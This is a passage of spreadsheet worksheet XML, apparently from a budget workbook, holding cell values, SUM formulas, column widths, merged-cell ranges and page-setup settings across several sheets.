      <c r="F3" s="767"/>
      <c r="G3" s="767"/>
      <c r="H3" s="767"/>
      <c r="I3" s="767"/>
      <c r="J3" s="767"/>
      <c r="K3" s="767"/>
      <c r="L3" s="106"/>
    </row>
    <row r="4" spans="1:20" s="2" customFormat="1" ht="26.1" customHeight="1">
      <c r="A4" s="769" t="s">
        <v>1106</v>
      </c>
      <c r="B4" s="769" t="s">
        <v>1107</v>
      </c>
      <c r="C4" s="769" t="s">
        <v>1108</v>
      </c>
      <c r="D4" s="769" t="s">
        <v>1109</v>
      </c>
      <c r="E4" s="769" t="s">
        <v>1110</v>
      </c>
      <c r="F4" s="769"/>
      <c r="G4" s="769"/>
      <c r="H4" s="769"/>
      <c r="I4" s="769"/>
      <c r="J4" s="769"/>
      <c r="K4" s="769"/>
      <c r="L4" s="107"/>
    </row>
    <row r="5" spans="1:20" s="2" customFormat="1" ht="26.1" customHeight="1">
      <c r="A5" s="769"/>
      <c r="B5" s="769"/>
      <c r="C5" s="769"/>
      <c r="D5" s="769"/>
      <c r="E5" s="95" t="s">
        <v>1111</v>
      </c>
      <c r="F5" s="95" t="s">
        <v>1112</v>
      </c>
      <c r="G5" s="95" t="s">
        <v>1113</v>
      </c>
      <c r="H5" s="95" t="s">
        <v>1114</v>
      </c>
      <c r="I5" s="95" t="s">
        <v>1115</v>
      </c>
      <c r="J5" s="95" t="s">
        <v>1116</v>
      </c>
      <c r="K5" s="95" t="s">
        <v>1117</v>
      </c>
      <c r="L5" s="107"/>
    </row>
    <row r="6" spans="1:20" s="2" customFormat="1" ht="26.1" customHeight="1">
      <c r="A6" s="770" t="s">
        <v>1118</v>
      </c>
      <c r="B6" s="770" t="s">
        <v>1103</v>
      </c>
      <c r="C6" s="96" t="s">
        <v>383</v>
      </c>
      <c r="D6" s="97">
        <f t="shared" ref="D6:K6" si="0">SUM(D7:D9)</f>
        <v>295807</v>
      </c>
      <c r="E6" s="97"/>
      <c r="F6" s="97">
        <f t="shared" si="0"/>
        <v>133550</v>
      </c>
      <c r="G6" s="97">
        <f t="shared" si="0"/>
        <v>110422</v>
      </c>
      <c r="H6" s="97">
        <f t="shared" si="0"/>
        <v>46475</v>
      </c>
      <c r="I6" s="97"/>
      <c r="J6" s="97">
        <f t="shared" si="0"/>
        <v>2750</v>
      </c>
      <c r="K6" s="97">
        <f t="shared" si="0"/>
        <v>2610</v>
      </c>
      <c r="L6" s="108"/>
      <c r="P6" s="109"/>
      <c r="Q6" s="109"/>
      <c r="S6" s="109"/>
      <c r="T6" s="109"/>
    </row>
    <row r="7" spans="1:20" s="2" customFormat="1" ht="26.1" customHeight="1">
      <c r="A7" s="771"/>
      <c r="B7" s="771"/>
      <c r="C7" s="98" t="s">
        <v>1099</v>
      </c>
      <c r="D7" s="99">
        <f t="shared" ref="D7:D9" si="1">SUM(E7:K7)</f>
        <v>3050</v>
      </c>
      <c r="E7" s="100"/>
      <c r="F7" s="101"/>
      <c r="G7" s="101"/>
      <c r="H7" s="101">
        <v>3050</v>
      </c>
      <c r="I7" s="100"/>
      <c r="J7" s="101"/>
      <c r="K7" s="100"/>
      <c r="L7" s="106"/>
      <c r="P7" s="110"/>
      <c r="Q7" s="110"/>
      <c r="S7" s="110"/>
      <c r="T7" s="110"/>
    </row>
    <row r="8" spans="1:20" s="2" customFormat="1" ht="26.1" customHeight="1">
      <c r="A8" s="771"/>
      <c r="B8" s="771"/>
      <c r="C8" s="98" t="s">
        <v>1119</v>
      </c>
      <c r="D8" s="99">
        <f t="shared" si="1"/>
        <v>37191</v>
      </c>
      <c r="E8" s="100"/>
      <c r="F8" s="101"/>
      <c r="G8" s="101"/>
      <c r="H8" s="101">
        <v>37191</v>
      </c>
      <c r="I8" s="100"/>
      <c r="J8" s="100"/>
      <c r="K8" s="100"/>
      <c r="L8" s="106"/>
      <c r="P8" s="110"/>
      <c r="Q8" s="110"/>
      <c r="S8" s="110"/>
      <c r="T8" s="110"/>
    </row>
    <row r="9" spans="1:20" s="2" customFormat="1" ht="26.1" customHeight="1">
      <c r="A9" s="771"/>
      <c r="B9" s="772"/>
      <c r="C9" s="102" t="s">
        <v>1102</v>
      </c>
      <c r="D9" s="99">
        <f t="shared" si="1"/>
        <v>255566</v>
      </c>
      <c r="E9" s="100"/>
      <c r="F9" s="101">
        <v>133550</v>
      </c>
      <c r="G9" s="101">
        <v>110422</v>
      </c>
      <c r="H9" s="101">
        <v>6234</v>
      </c>
      <c r="I9" s="101"/>
      <c r="J9" s="101">
        <v>2750</v>
      </c>
      <c r="K9" s="101">
        <v>2610</v>
      </c>
      <c r="L9" s="106"/>
      <c r="P9" s="110"/>
      <c r="Q9" s="110"/>
      <c r="S9" s="110"/>
      <c r="T9" s="110"/>
    </row>
    <row r="10" spans="1:20" s="2" customFormat="1" ht="26.1" customHeight="1">
      <c r="A10" s="771"/>
      <c r="B10" s="771" t="s">
        <v>1100</v>
      </c>
      <c r="C10" s="96" t="s">
        <v>383</v>
      </c>
      <c r="D10" s="103">
        <f t="shared" ref="D10:K10" si="2">SUM(D11:D13)</f>
        <v>691645</v>
      </c>
      <c r="E10" s="103"/>
      <c r="F10" s="103">
        <f t="shared" si="2"/>
        <v>27100</v>
      </c>
      <c r="G10" s="103">
        <f t="shared" si="2"/>
        <v>159245</v>
      </c>
      <c r="H10" s="103">
        <f t="shared" si="2"/>
        <v>36000</v>
      </c>
      <c r="I10" s="103"/>
      <c r="J10" s="103">
        <f t="shared" si="2"/>
        <v>460300</v>
      </c>
      <c r="K10" s="103">
        <f t="shared" si="2"/>
        <v>9000</v>
      </c>
      <c r="L10" s="108"/>
      <c r="P10" s="109"/>
      <c r="Q10" s="109"/>
      <c r="S10" s="109"/>
      <c r="T10" s="109"/>
    </row>
    <row r="11" spans="1:20" s="2" customFormat="1" ht="26.1" customHeight="1">
      <c r="A11" s="771"/>
      <c r="B11" s="771"/>
      <c r="C11" s="98" t="s">
        <v>1099</v>
      </c>
      <c r="D11" s="99">
        <f t="shared" ref="D11:D13" si="3">SUM(E11:K11)</f>
        <v>504900</v>
      </c>
      <c r="E11" s="101"/>
      <c r="F11" s="101">
        <v>27100</v>
      </c>
      <c r="G11" s="101">
        <v>6300</v>
      </c>
      <c r="H11" s="101">
        <v>2200</v>
      </c>
      <c r="I11" s="101"/>
      <c r="J11" s="101">
        <v>460300</v>
      </c>
      <c r="K11" s="101">
        <v>9000</v>
      </c>
      <c r="L11" s="106"/>
      <c r="P11" s="110"/>
      <c r="Q11" s="110"/>
      <c r="S11" s="110"/>
      <c r="T11" s="110"/>
    </row>
    <row r="12" spans="1:20" s="2" customFormat="1" ht="26.1" customHeight="1">
      <c r="A12" s="771"/>
      <c r="B12" s="771"/>
      <c r="C12" s="98" t="s">
        <v>1119</v>
      </c>
      <c r="D12" s="99">
        <f t="shared" si="3"/>
        <v>66700</v>
      </c>
      <c r="E12" s="101"/>
      <c r="F12" s="101"/>
      <c r="G12" s="101">
        <v>40020</v>
      </c>
      <c r="H12" s="101">
        <v>26680</v>
      </c>
      <c r="I12" s="101"/>
      <c r="J12" s="101"/>
      <c r="K12" s="101"/>
      <c r="L12" s="106"/>
      <c r="M12" s="111"/>
      <c r="P12" s="110"/>
      <c r="Q12" s="110"/>
      <c r="S12" s="110"/>
      <c r="T12" s="110"/>
    </row>
    <row r="13" spans="1:20" s="2" customFormat="1" ht="26.1" customHeight="1">
      <c r="A13" s="772"/>
      <c r="B13" s="772"/>
      <c r="C13" s="102" t="s">
        <v>1102</v>
      </c>
      <c r="D13" s="99">
        <f t="shared" si="3"/>
        <v>120045</v>
      </c>
      <c r="E13" s="101"/>
      <c r="F13" s="101"/>
      <c r="G13" s="101">
        <v>112925</v>
      </c>
      <c r="H13" s="101">
        <v>7120</v>
      </c>
      <c r="I13" s="101"/>
      <c r="J13" s="101"/>
      <c r="K13" s="101"/>
      <c r="L13" s="106"/>
      <c r="P13" s="110"/>
      <c r="Q13" s="110"/>
      <c r="S13" s="110"/>
      <c r="T13" s="110"/>
    </row>
    <row r="14" spans="1:20" s="2" customFormat="1" ht="14.25">
      <c r="B14" s="104"/>
      <c r="C14" s="105"/>
      <c r="D14" s="105"/>
    </row>
    <row r="15" spans="1:20" s="2" customFormat="1" ht="14.25">
      <c r="B15" s="104"/>
      <c r="C15" s="105"/>
      <c r="D15" s="105"/>
    </row>
    <row r="16" spans="1:20" s="2" customFormat="1" ht="14.25">
      <c r="B16" s="104"/>
      <c r="C16" s="105"/>
      <c r="D16" s="105"/>
    </row>
    <row r="17" spans="2:4" s="2" customFormat="1" ht="14.25">
      <c r="B17" s="104"/>
      <c r="C17" s="105"/>
      <c r="D17" s="105"/>
    </row>
    <row r="18" spans="2:4" s="2" customFormat="1" ht="14.25">
      <c r="B18" s="104"/>
      <c r="C18" s="105"/>
      <c r="D18" s="105"/>
    </row>
    <row r="19" spans="2:4" s="2" customFormat="1" ht="14.25">
      <c r="B19" s="104"/>
      <c r="C19" s="105"/>
      <c r="D19" s="105"/>
    </row>
    <row r="20" spans="2:4" s="2" customFormat="1" ht="14.25">
      <c r="B20" s="104"/>
      <c r="C20" s="105"/>
      <c r="D20" s="105"/>
    </row>
    <row r="21" spans="2:4" s="2" customFormat="1" ht="14.25">
      <c r="B21" s="104"/>
      <c r="C21" s="105"/>
      <c r="D21" s="105"/>
    </row>
    <row r="22" spans="2:4" s="2" customFormat="1" ht="14.25">
      <c r="B22" s="104"/>
      <c r="C22" s="105"/>
      <c r="D22" s="105"/>
    </row>
    <row r="23" spans="2:4" s="2" customFormat="1" ht="14.25">
      <c r="B23" s="104"/>
      <c r="C23" s="105"/>
      <c r="D23" s="105"/>
    </row>
    <row r="24" spans="2:4" s="2" customFormat="1" ht="14.25">
      <c r="B24" s="104"/>
      <c r="C24" s="105"/>
      <c r="D24" s="105"/>
    </row>
    <row r="25" spans="2:4" s="2" customFormat="1" ht="14.25">
      <c r="B25" s="104"/>
      <c r="C25" s="105"/>
      <c r="D25" s="105"/>
    </row>
    <row r="26" spans="2:4" s="2" customFormat="1" ht="14.25">
      <c r="B26" s="104"/>
      <c r="C26" s="105"/>
      <c r="D26" s="105"/>
    </row>
    <row r="27" spans="2:4" s="2" customFormat="1" ht="14.25">
      <c r="B27" s="104"/>
      <c r="C27" s="105"/>
      <c r="D27" s="105"/>
    </row>
    <row r="28" spans="2:4" s="2" customFormat="1" ht="14.25">
      <c r="B28" s="104"/>
      <c r="C28" s="105"/>
      <c r="D28" s="105"/>
    </row>
    <row r="29" spans="2:4" s="2" customFormat="1" ht="14.25">
      <c r="B29" s="104"/>
      <c r="C29" s="105"/>
      <c r="D29" s="105"/>
    </row>
    <row r="30" spans="2:4" s="2" customFormat="1" ht="14.25">
      <c r="B30" s="104"/>
      <c r="C30" s="105"/>
      <c r="D30" s="105"/>
    </row>
    <row r="31" spans="2:4" s="2" customFormat="1" ht="14.25">
      <c r="B31" s="104"/>
      <c r="C31" s="105"/>
      <c r="D31" s="105"/>
    </row>
    <row r="32" spans="2:4" s="2" customFormat="1" ht="14.25">
      <c r="B32" s="104"/>
      <c r="C32" s="105"/>
      <c r="D32" s="105"/>
    </row>
    <row r="33" spans="2:4" s="2" customFormat="1" ht="14.25">
      <c r="B33" s="104"/>
      <c r="C33" s="105"/>
      <c r="D33" s="105"/>
    </row>
    <row r="34" spans="2:4" s="2" customFormat="1" ht="14.25">
      <c r="B34" s="104"/>
      <c r="C34" s="105"/>
      <c r="D34" s="105"/>
    </row>
    <row r="35" spans="2:4" s="2" customFormat="1" ht="14.25">
      <c r="B35" s="104"/>
      <c r="C35" s="105"/>
      <c r="D35" s="105"/>
    </row>
  </sheetData>
  <mergeCells count="10">
    <mergeCell ref="A2:K2"/>
    <mergeCell ref="A3:K3"/>
    <mergeCell ref="E4:K4"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="A6:A13"/>
    <mergeCell ref="B4:B5"/>
    <mergeCell ref="B6:B9"/>
    <mergeCell ref="B10:B13"/>
    <mergeCell ref="C4:C5"/>
    <mergeCell ref="D4:D5"/>
  </mergeCells>
  <phoneticPr fontId="54" type="noConversion"/>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.39305555555555599" right="0.39305555555555599" top="0.39305555555555599" bottom="0.39305555555555599" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" scale="89" fitToHeight="0"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E10" sqref="E10"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="38.28515625" style="2" customWidth="1"/>
    <col min="2" max="3" width="24.7109375" style="2" customWidth="1"/>
    <col min="4" max="5" width="10.7109375" style="2" customWidth="1"/>
    <col min="6" max="6" width="11.85546875" style="2" customWidth="1"/>
    <col min="7" max="7" width="11.28515625" style="2" customWidth="1"/>
    <col min="8" max="8" width="12.28515625" style="2" customWidth="1"/>
    <col min="9" max="16384" width="10" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:9" ht="24" customHeight="1">
      <c r="A1" s="38" t="s">
        <v>1120</v>
      </c>
      <c r="B1" s="59"/>
      <c r="C1" s="59"/>
      <c r="D1" s="59"/>
      <c r="E1" s="59"/>
      <c r="F1" s="59"/>
      <c r="G1" s="59"/>
      <c r="H1" s="59"/>
    </row>
    <row r="2" spans="1:9" ht="30" customHeight="1">
      <c r="A2" s="773" t="s">
        <v>1121</v>
      </c>
      <c r="B2" s="773"/>
      <c r="C2" s="773"/>
      <c r="D2" s="84"/>
      <c r="E2" s="84"/>
      <c r="F2" s="84"/>
      <c r="G2" s="84"/>
      <c r="H2" s="84"/>
      <c r="I2" s="84"/>
    </row>
    <row r="3" spans="1:9" ht="24" customHeight="1">
      <c r="A3" s="754" t="s">
        <v>270</v>
      </c>
      <c r="B3" s="754"/>
      <c r="C3" s="754"/>
      <c r="D3" s="85"/>
      <c r="E3" s="85"/>
      <c r="F3" s="85"/>
      <c r="G3" s="85"/>
      <c r="H3" s="86"/>
    </row>
    <row r="4" spans="1:9" ht="27.95" customHeight="1">
      <c r="A4" s="41" t="s">
        <v>532</v>
      </c>
      <c r="B4" s="60" t="s">
        <v>1122</v>
      </c>
      <c r="C4" s="60" t="s">
        <v>1123</v>
      </c>
      <c r="D4" s="65"/>
      <c r="E4" s="65"/>
      <c r="F4" s="65"/>
      <c r="G4" s="65"/>
      <c r="H4" s="65"/>
    </row>
    <row r="5" spans="1:9" ht="27.95" customHeight="1">
      <c r="A5" s="87" t="s">
        <v>383</v>
      </c>
      <c r="B5" s="88"/>
      <c r="C5" s="88"/>
      <c r="D5" s="65"/>
      <c r="E5" s="65"/>
      <c r="F5" s="65"/>
      <c r="G5" s="65"/>
      <c r="H5" s="65"/>
    </row>
    <row r="6" spans="1:9" ht="27.95" customHeight="1">
      <c r="A6" s="89" t="s">
        <v>1124</v>
      </c>
      <c r="B6" s="63"/>
      <c r="C6" s="63"/>
      <c r="D6" s="65"/>
      <c r="E6" s="65"/>
      <c r="F6" s="65"/>
      <c r="G6" s="65"/>
      <c r="H6" s="65"/>
    </row>
    <row r="7" spans="1:9" ht="27.95" customHeight="1">
      <c r="A7" s="89" t="s">
        <v>1125</v>
      </c>
      <c r="B7" s="63"/>
      <c r="C7" s="63"/>
      <c r="D7" s="65"/>
      <c r="E7" s="65"/>
      <c r="F7" s="65"/>
      <c r="G7" s="65"/>
      <c r="H7" s="65"/>
    </row>
    <row r="8" spans="1:9" ht="27.95" customHeight="1">
      <c r="A8" s="89" t="s">
        <v>1126</v>
      </c>
      <c r="B8" s="63"/>
      <c r="C8" s="63"/>
      <c r="D8" s="65"/>
      <c r="E8" s="65"/>
      <c r="F8" s="65"/>
      <c r="G8" s="65"/>
      <c r="H8" s="65"/>
    </row>
    <row r="9" spans="1:9" ht="27.95" customHeight="1">
      <c r="A9" s="89" t="s">
        <v>1127</v>
      </c>
      <c r="B9" s="63"/>
      <c r="C9" s="63"/>
      <c r="D9" s="65"/>
      <c r="E9" s="65"/>
      <c r="F9" s="65"/>
      <c r="G9" s="65"/>
      <c r="H9" s="65"/>
    </row>
    <row r="10" spans="1:9" ht="27.95" customHeight="1">
      <c r="A10" s="89" t="s">
        <v>1128</v>
      </c>
      <c r="B10" s="63"/>
      <c r="C10" s="63"/>
      <c r="D10" s="65"/>
      <c r="E10" s="65"/>
      <c r="F10" s="65"/>
      <c r="G10" s="65"/>
      <c r="H10" s="65"/>
    </row>
    <row r="11" spans="1:9" ht="27.95" customHeight="1">
      <c r="A11" s="89" t="s">
        <v>1129</v>
      </c>
      <c r="B11" s="63"/>
      <c r="C11" s="63"/>
      <c r="D11" s="65"/>
      <c r="E11" s="65"/>
      <c r="F11" s="65"/>
      <c r="G11" s="65"/>
      <c r="H11" s="65"/>
    </row>
    <row r="12" spans="1:9" ht="27.95" customHeight="1">
      <c r="A12" s="89" t="s">
        <v>1130</v>
      </c>
      <c r="B12" s="63"/>
      <c r="C12" s="63"/>
      <c r="D12" s="65"/>
      <c r="E12" s="65"/>
      <c r="F12" s="65"/>
      <c r="G12" s="65"/>
      <c r="H12" s="65"/>
    </row>
    <row r="13" spans="1:9" ht="27.95" customHeight="1">
      <c r="A13" s="89" t="s">
        <v>1131</v>
      </c>
      <c r="B13" s="63"/>
      <c r="C13" s="63"/>
      <c r="D13" s="65"/>
      <c r="E13" s="65"/>
      <c r="F13" s="65"/>
      <c r="G13" s="65"/>
      <c r="H13" s="65"/>
    </row>
    <row r="14" spans="1:9" ht="27.95" customHeight="1">
      <c r="A14" s="89" t="s">
        <v>1132</v>
      </c>
      <c r="B14" s="63"/>
      <c r="C14" s="63"/>
      <c r="D14" s="65"/>
      <c r="E14" s="65"/>
      <c r="F14" s="65"/>
      <c r="G14" s="65"/>
      <c r="H14" s="65"/>
    </row>
    <row r="15" spans="1:9" ht="27.95" customHeight="1">
      <c r="A15" s="89" t="s">
        <v>1133</v>
      </c>
      <c r="B15" s="63"/>
      <c r="C15" s="63"/>
      <c r="D15" s="65"/>
      <c r="E15" s="65"/>
      <c r="F15" s="65"/>
      <c r="G15" s="65"/>
      <c r="H15" s="65"/>
    </row>
    <row r="16" spans="1:9" ht="27.95" customHeight="1">
      <c r="A16" s="89" t="s">
        <v>1134</v>
      </c>
      <c r="B16" s="63"/>
      <c r="C16" s="63"/>
      <c r="D16" s="65"/>
      <c r="E16" s="65"/>
      <c r="F16" s="65"/>
      <c r="G16" s="65"/>
      <c r="H16" s="65"/>
    </row>
    <row r="17" spans="1:8" ht="27.95" customHeight="1">
      <c r="A17" s="89" t="s">
        <v>1135</v>
      </c>
      <c r="B17" s="63"/>
      <c r="C17" s="63"/>
      <c r="D17" s="65"/>
      <c r="E17" s="65"/>
      <c r="F17" s="65"/>
      <c r="G17" s="65"/>
      <c r="H17" s="65"/>
    </row>
    <row r="18" spans="1:8" ht="27.95" customHeight="1">
      <c r="A18" s="89" t="s">
        <v>1136</v>
      </c>
      <c r="B18" s="63"/>
      <c r="C18" s="63"/>
      <c r="D18" s="65"/>
      <c r="E18" s="65"/>
      <c r="F18" s="65"/>
      <c r="G18" s="65"/>
      <c r="H18" s="65"/>
    </row>
    <row r="19" spans="1:8" ht="27.95" customHeight="1">
      <c r="A19" s="89" t="s">
        <v>1137</v>
      </c>
      <c r="B19" s="63"/>
      <c r="C19" s="63"/>
      <c r="D19" s="65"/>
      <c r="E19" s="65"/>
      <c r="F19" s="65"/>
      <c r="G19" s="65"/>
      <c r="H19" s="65"/>
    </row>
    <row r="20" spans="1:8" ht="27.95" customHeight="1">
      <c r="A20" s="89" t="s">
        <v>1138</v>
      </c>
      <c r="B20" s="63"/>
      <c r="C20" s="63"/>
      <c r="D20" s="65"/>
      <c r="E20" s="65"/>
      <c r="F20" s="65"/>
      <c r="G20" s="65"/>
      <c r="H20" s="65"/>
    </row>
    <row r="21" spans="1:8" ht="27.95" customHeight="1">
      <c r="A21" s="89" t="s">
        <v>1139</v>
      </c>
      <c r="B21" s="63"/>
      <c r="C21" s="63"/>
      <c r="D21" s="65"/>
      <c r="E21" s="65"/>
      <c r="F21" s="65"/>
      <c r="G21" s="65"/>
      <c r="H21" s="65"/>
    </row>
    <row r="22" spans="1:8" ht="24" customHeight="1">
      <c r="A22" s="90" t="s">
        <v>1140</v>
      </c>
      <c r="B22" s="65"/>
      <c r="C22" s="65"/>
      <c r="D22" s="65"/>
      <c r="E22" s="65"/>
      <c r="F22" s="65"/>
      <c r="G22" s="65"/>
    </row>
    <row r="23" spans="1:8">
      <c r="A23" s="44"/>
      <c r="B23" s="65"/>
      <c r="C23" s="65"/>
      <c r="D23" s="65"/>
      <c r="E23" s="65"/>
      <c r="F23" s="65"/>
      <c r="G23" s="65"/>
      <c r="H23" s="65"/>
    </row>
    <row r="24" spans="1:8">
      <c r="B24" s="65"/>
      <c r="C24" s="65"/>
      <c r="D24" s="65"/>
      <c r="E24" s="65"/>
      <c r="F24" s="65"/>
      <c r="G24" s="65"/>
      <c r="H24" s="65"/>
    </row>
    <row r="25" spans="1:8">
      <c r="B25" s="65"/>
      <c r="C25" s="65"/>
      <c r="D25" s="65"/>
      <c r="E25" s="65"/>
      <c r="F25" s="65"/>
      <c r="G25" s="65"/>
      <c r="H25" s="65"/>
    </row>
    <row r="26" spans="1:8">
      <c r="B26" s="65"/>
      <c r="C26" s="65"/>
      <c r="D26" s="65"/>
      <c r="E26" s="65"/>
      <c r="F26" s="65"/>
      <c r="G26" s="65"/>
      <c r="H26" s="65"/>
    </row>
    <row r="27" spans="1:8">
      <c r="B27" s="65"/>
      <c r="C27" s="65"/>
      <c r="D27" s="65"/>
      <c r="E27" s="65"/>
      <c r="F27" s="65"/>
      <c r="G27" s="65"/>
      <c r="H27" s="65"/>
    </row>
    <row r="28" spans="1:8">
      <c r="B28" s="65"/>
      <c r="C28" s="65"/>
      <c r="D28" s="65"/>
      <c r="E28" s="65"/>
      <c r="F28" s="65"/>
      <c r="G28" s="65"/>
      <c r="H28" s="65"/>
    </row>
    <row r="29" spans="1:8">
      <c r="B29" s="65"/>
      <c r="C29" s="65"/>
      <c r="D29" s="65"/>
      <c r="E29" s="65"/>
      <c r="F29" s="65"/>
      <c r="G29" s="65"/>
      <c r="H29" s="65"/>
    </row>
    <row r="30" spans="1:8">
      <c r="B30" s="65"/>
      <c r="C30" s="65"/>
      <c r="D30" s="65"/>
      <c r="E30" s="65"/>
      <c r="F30" s="65"/>
      <c r="G30" s="65"/>
      <c r="H30" s="65"/>
    </row>
    <row r="31" spans="1:8">
      <c r="B31" s="65"/>
      <c r="C31" s="65"/>
      <c r="D31" s="65"/>
      <c r="E31" s="65"/>
      <c r="F31" s="65"/>
      <c r="G31" s="65"/>
      <c r="H31" s="65"/>
    </row>
    <row r="32" spans="1:8">
      <c r="B32" s="65"/>
      <c r="C32" s="65"/>
      <c r="D32" s="65"/>
      <c r="E32" s="65"/>
      <c r="F32" s="65"/>
      <c r="G32" s="65"/>
      <c r="H32" s="65"/>
    </row>
    <row r="33" spans="2:8">
      <c r="B33" s="65"/>
      <c r="C33" s="65"/>
      <c r="D33" s="65"/>
      <c r="E33" s="65"/>
      <c r="F33" s="65"/>
      <c r="G33" s="65"/>
      <c r="H33" s="65"/>
    </row>
    <row r="34" spans="2:8">
      <c r="B34" s="65"/>
      <c r="C34" s="65"/>
      <c r="D34" s="65"/>
      <c r="E34" s="65"/>
      <c r="F34" s="65"/>
      <c r="G34" s="65"/>
      <c r="H34" s="65"/>
    </row>
    <row r="35" spans="2:8">
      <c r="B35" s="65"/>
      <c r="C35" s="65"/>
      <c r="D35" s="65"/>
      <c r="E35" s="65"/>
      <c r="F35" s="65"/>
      <c r="G35" s="65"/>
      <c r="H35" s="65"/>
    </row>
    <row r="36" spans="2:8">
      <c r="B36" s="65"/>
      <c r="C36" s="65"/>
      <c r="D36" s="65"/>
      <c r="E36" s="65"/>
      <c r="F36" s="65"/>
      <c r="G36" s="65"/>
      <c r="H36" s="65"/>
    </row>
    <row r="37" spans="2:8">
      <c r="B37" s="65"/>
      <c r="C37" s="65"/>
      <c r="D37" s="65"/>
      <c r="E37" s="65"/>
      <c r="F37" s="65"/>
      <c r="G37" s="65"/>
      <c r="H37" s="65"/>
    </row>
    <row r="38" spans="2:8">
      <c r="B38" s="65"/>
      <c r="C38" s="65"/>
      <c r="D38" s="65"/>
      <c r="E38" s="65"/>
      <c r="F38" s="65"/>
      <c r="G38" s="65"/>
      <c r="H38" s="65"/>
    </row>
    <row r="39" spans="2:8">
      <c r="B39" s="65"/>
      <c r="C39" s="65"/>
      <c r="D39" s="65"/>
      <c r="E39" s="65"/>
      <c r="F39" s="65"/>
      <c r="G39" s="65"/>
      <c r="H39" s="65"/>
    </row>
    <row r="40" spans="2:8">
      <c r="B40" s="65"/>
      <c r="C40" s="65"/>
      <c r="D40" s="65"/>
      <c r="E40" s="65"/>
      <c r="F40" s="65"/>
      <c r="G40" s="65"/>
      <c r="H40" s="65"/>
    </row>
    <row r="41" spans="2:8">
      <c r="B41" s="65"/>
      <c r="C41" s="65"/>
      <c r="D41" s="65"/>
      <c r="E41" s="65"/>
      <c r="F41" s="65"/>
      <c r="G41" s="65"/>
      <c r="H41" s="65"/>
    </row>
    <row r="42" spans="2:8">
      <c r="B42" s="65"/>
      <c r="C42" s="65"/>
      <c r="D42" s="65"/>
      <c r="E42" s="65"/>
      <c r="F42" s="65"/>
      <c r="G42" s="65"/>
      <c r="H42" s="65"/>
    </row>
    <row r="43" spans="2:8">
      <c r="B43" s="65"/>
      <c r="C43" s="65"/>
      <c r="D43" s="65"/>
      <c r="E43" s="65"/>
      <c r="F43" s="65"/>
      <c r="G43" s="65"/>
      <c r="H43" s="65"/>
    </row>
    <row r="44" spans="2:8">
      <c r="B44" s="65"/>
      <c r="C44" s="65"/>
      <c r="D44" s="65"/>
      <c r="E44" s="65"/>
      <c r="F44" s="65"/>
      <c r="G44" s="65"/>
      <c r="H44" s="65"/>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A2:C2"/>
    <mergeCell ref="A3:C3"/>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election activeCell="G9" sqref="G9"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="58" style="2" customWidth="1"/>
    <col min="2" max="2" width="27.42578125" style="2" customWidth="1"/>
    <col min="3" max="4" width="10.7109375" style="2" customWidth="1"/>
    <col min="5" max="5" width="11.85546875" style="2" customWidth="1"/>
    <col min="6" max="6" width="11.28515625" style="2" customWidth="1"/>
    <col min="7" max="7" width="12.28515625" style="2" customWidth="1"/>
    <col min="8" max="16384" width="10" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="24" customHeight="1">
      <c r="A1" s="38" t="s">
        <v>1141</v>
      </c>
      <c r="B1" s="59"/>
      <c r="C1" s="59"/>
      <c r="D1" s="59"/>
      <c r="E1" s="59"/>
      <c r="F1" s="59"/>
      <c r="G1" s="59"/>
    </row>
    <row r="2" spans="1:8" ht="30" customHeight="1">
      <c r="A2" s="773" t="s">
        <v>1142</v>
      </c>
      <c r="B2" s="773"/>
      <c r="C2" s="84"/>
      <c r="D2" s="84"/>
      <c r="E2" s="84"/>
      <c r="F2" s="84"/>
      <c r="G2" s="84"/>
      <c r="H2" s="84"/>
    </row>
    <row r="3" spans="1:8" ht="24" customHeight="1">
      <c r="A3" s="754" t="s">
        <v>270</v>
      </c>
      <c r="B3" s="754"/>
      <c r="C3" s="85"/>
      <c r="D3" s="85"/>
      <c r="E3" s="85"/>
      <c r="F3" s="85"/>
      <c r="G3" s="86"/>
    </row>
    <row r="4" spans="1:8" ht="27.95" customHeight="1">
      <c r="A4" s="41" t="s">
        <v>532</v>
      </c>
      <c r="B4" s="60" t="s">
        <v>957</v>
      </c>
      <c r="C4" s="65"/>
      <c r="D4" s="65"/>
      <c r="E4" s="65"/>
      <c r="F4" s="65"/>
      <c r="G4" s="65"/>
    </row>
    <row r="5" spans="1:8" ht="27.95" customHeight="1">
      <c r="A5" s="87" t="s">
        <v>383</v>
      </c>
      <c r="B5" s="88">
        <f>SUM(B6:B21)-B11</f>
        <v>147000</v>
      </c>
      <c r="C5" s="65"/>
      <c r="D5" s="65"/>
      <c r="E5" s="65"/>
      <c r="F5" s="65"/>
      <c r="G5" s="65"/>
    </row>
    <row r="6" spans="1:8" ht="27.95" customHeight="1">
      <c r="A6" s="89" t="s">
        <v>1124</v>
      </c>
      <c r="B6" s="63"/>
      <c r="C6" s="65"/>
      <c r="D6" s="65"/>
      <c r="E6" s="65"/>
      <c r="F6" s="65"/>
      <c r="G6" s="65"/>
    </row>
    <row r="7" spans="1:8" ht="27.95" customHeight="1">
      <c r="A7" s="89" t="s">
        <v>1125</v>
      </c>
      <c r="B7" s="63"/>
      <c r="C7" s="65"/>
      <c r="D7" s="65"/>
      <c r="E7" s="65"/>
      <c r="F7" s="65"/>
      <c r="G7" s="65"/>
    </row>
    <row r="8" spans="1:8" ht="27.95" customHeight="1">
      <c r="A8" s="89" t="s">
        <v>1126</v>
      </c>
      <c r="B8" s="63"/>
      <c r="C8" s="65"/>
      <c r="D8" s="65"/>
      <c r="E8" s="65"/>
      <c r="F8" s="65"/>
      <c r="G8" s="65"/>
    </row>
    <row r="9" spans="1:8" ht="27.95" customHeight="1">
      <c r="A9" s="89" t="s">
        <v>1127</v>
      </c>
      <c r="B9" s="63"/>
      <c r="C9" s="65"/>
      <c r="D9" s="65"/>
      <c r="E9" s="65"/>
      <c r="F9" s="65"/>
      <c r="G9" s="65"/>
    </row>
    <row r="10" spans="1:8" ht="27.95" customHeight="1">
      <c r="A10" s="89" t="s">
        <v>1128</v>
      </c>
      <c r="B10" s="63"/>
